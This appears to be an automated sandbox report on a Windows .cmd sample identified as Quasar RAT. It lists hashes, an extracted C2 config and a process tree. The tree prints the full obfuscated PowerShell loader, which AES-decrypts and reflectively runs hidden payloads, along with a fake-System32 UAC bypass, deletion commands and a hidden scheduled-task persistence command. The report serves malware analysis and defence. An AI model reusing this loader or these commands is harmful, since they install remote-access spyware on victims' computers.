Overview

overview

10

Static

static

1

1f788a79d0...85.cmd

windows7-x64

3

1f788a79d0...85.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/10/2024, 01:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd

  • Size

    537KB

  • MD5

    d20bf8dba792e2edc3e0eb7e5c30b32b

  • SHA1

    7094e6e59004962f3d3161aa3016ecfcf2b3a64f

  • SHA256

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

  • SHA512

    c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

  • SSDEEP

    12288:100ynYtHxuu7eaSvaoBTiFrrdkrw1vH5FiaPQdgEMlB:10KtR3lehBAr/1vian1B

Score
10/10
quasaroffice04defense_evasiondiscoveryexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:512
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2092
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:228
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:112
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4544
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1184
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3168
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4424
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2396
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2148
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:4996
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3052
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1304
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1084
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1860
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4004
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 896
              5⤵
              • Program crash
              PID:3516
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4876
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485')
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4544 -ip 4544
      1⤵
        PID:980

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        928d36ad618a369ffebf44885d07cf81

        SHA1

        edf5a353a919c1873af8e6a0dfafa4c38c626975

        SHA256

        d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

        SHA512

        4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        b468cbca91962cba64f84422d738e6f2

        SHA1

        cdaf2f51d0c3f750377a704c86c67adff0ec5617

        SHA256

        601407a3f7ff415d933dae5e6f2f0479349d8e84a745f98c94ae99dd30977ac7

        SHA512

        85e55e702c71385e0d21278e5570733631dcb5cae6623d740317807d3c4b0f43f64117567de66e67e0ac9d688aed3b6f8605d8ea2d4218ffc8a08c9671b89ee4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        18KB

        MD5

        fb63f94df04e957843377cd9d212b1c0

        SHA1

        5a8684f89ae0187e9b3856b80ee4202d6088ca5e

        SHA256

        0ca604e3339a335467af11834569f84160b0cafb5e97702f464004827e9d142d

        SHA512

        a0d36984d0de47007f4c6d412436f9e9956b766627959e72855b2fc8df799bcd4c2292294601073642ceca10b19f2655e313c93b5e90dc280bc8dea025b27687

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        21KB

        MD5

        55f05fc0d90e580f10874f328bc6747d

        SHA1

        e88ffd9daddb38800f2e72b9b4305d738a1323f9

        SHA256

        252005216ca32358a1a17a43a1797f8aee83161553232651a2581148d682073f

        SHA512

        ec897a0cb9fa76692827fe5a96ef1b96ba98e75255a2a65aeb262c6d5b7df1f5b9a7ba64b937c80c94c73c24560a4acf5dd96b0de619a54c470d06c04cecc88b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        420B

        MD5

        66fbdc363098bb4d74b1ffb12a9e8848

        SHA1

        393b3ef59db212c95c4debc66757ece531ce73b4

        SHA256

        de9be2d489f3c295636c0a7c8806242f74db46d27160d7eadb18815e16b0052a

        SHA512

        804b8dd30058c83fb7f276f98623af9cd53b4daac2bef2cd22449ed01ba9dde60a9db0030cd6c5bed1cb796231f5c703189333e01f49b3cf56114d1b759ce850

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        7284f2bbdaa6a201dde977e16e03938f

        SHA1

        1ba4f163ad07026e51e15dcc63c4bc6e12b8de1d

        SHA256

        43bad0e8e32503be7d77158888ea58d5f08a1aa61568e3acc1db20b869444d14

        SHA512

        70fd7ef2943fa346c3f12b0735dd6a620a0a5f3ae5c67a98e2a8138e2c9e5a7baa8b0a4c8a51515c637be2c6722643c53b0333747c779f15b79d9ce4fae166ae

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        a7ba4bb093d54c741ddfc3787efcba3b

        SHA1

        dd9743a291e2b31365658070b9ef27e818ad87a4

        SHA256

        755c05aed0c38ab54d76040a61c576b40479dadc13448c5e75bb322ac6eedc8e

        SHA512

        db5c1d21d32e2db3abd3410f4a620d5b86f20c4f1605bf5d90795471f6452f46fea87490e0d7bd178aacc40b370d40f05c718c7d2578c9913ddbb2e951cda1bf

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        21KB

        MD5

        6f0102075117d72cad70be22f21bfe51

        SHA1

        15eb170494182cfec37c7b56aa7ce50afc6a23fe

        SHA256

        c10a882c42d375fe1c905aa4fd4d3f4325da9905f9d5d558a98828ba1b67112c

        SHA512

        688577071607c31c557760e19b2185a53a1607b6edc4f5844b4f7ef97375f37c0a5cd07530bfcf472daff004594223efede1ffc0260e04a86140f768f6b26722

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        ccb107538c41a829f0a951643bd0f2d4

        SHA1

        5c875be012acd1be1c4e8ffade41d243d6096416

        SHA256

        b41c3085bf3e2a7bad8d931d7a83863993d32570a804df5afbe9303c82f40ee4

        SHA512

        670750a10a8594bde5f7c48ead52fce2f49d62bf672675b6e47c5c1b58487d8ebe6048f06cde9ae84141972cfb9c6c8b48c8608c0e619d556b6c0cd767d6815e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd
        Filesize

        537KB

        MD5

        d20bf8dba792e2edc3e0eb7e5c30b32b

        SHA1

        7094e6e59004962f3d3161aa3016ecfcf2b3a64f

        SHA256

        1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

        SHA512

        c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5gxcdwv.wbv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd
        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

        Download Submit

      • C:\Windows \System32\ComputerDefaults.exe
        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

        Download Submit

      • C:\Windows \System32\MLANG.dll
        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

        Download Submit

      • memory/112-107-0x000000000A920000-0x000000000A9D2000-memory.dmp

        Filesize

        712KB

        Download

      • memory/112-116-0x000000000F110000-0x000000000F122000-memory.dmp

        Filesize

        72KB

        Download

      • memory/112-117-0x000000000F170000-0x000000000F1AC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/112-110-0x000000000EAB0000-0x000000000F0C8000-memory.dmp

        Filesize

        6.1MB

        Download

      • memory/112-108-0x000000000E2C0000-0x000000000E482000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/112-106-0x000000000A810000-0x000000000A860000-memory.dmp

        Filesize

        320KB

        Download

      • memory/112-94-0x00000000051D0000-0x00000000051DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/112-93-0x000000000A500000-0x000000000A592000-memory.dmp

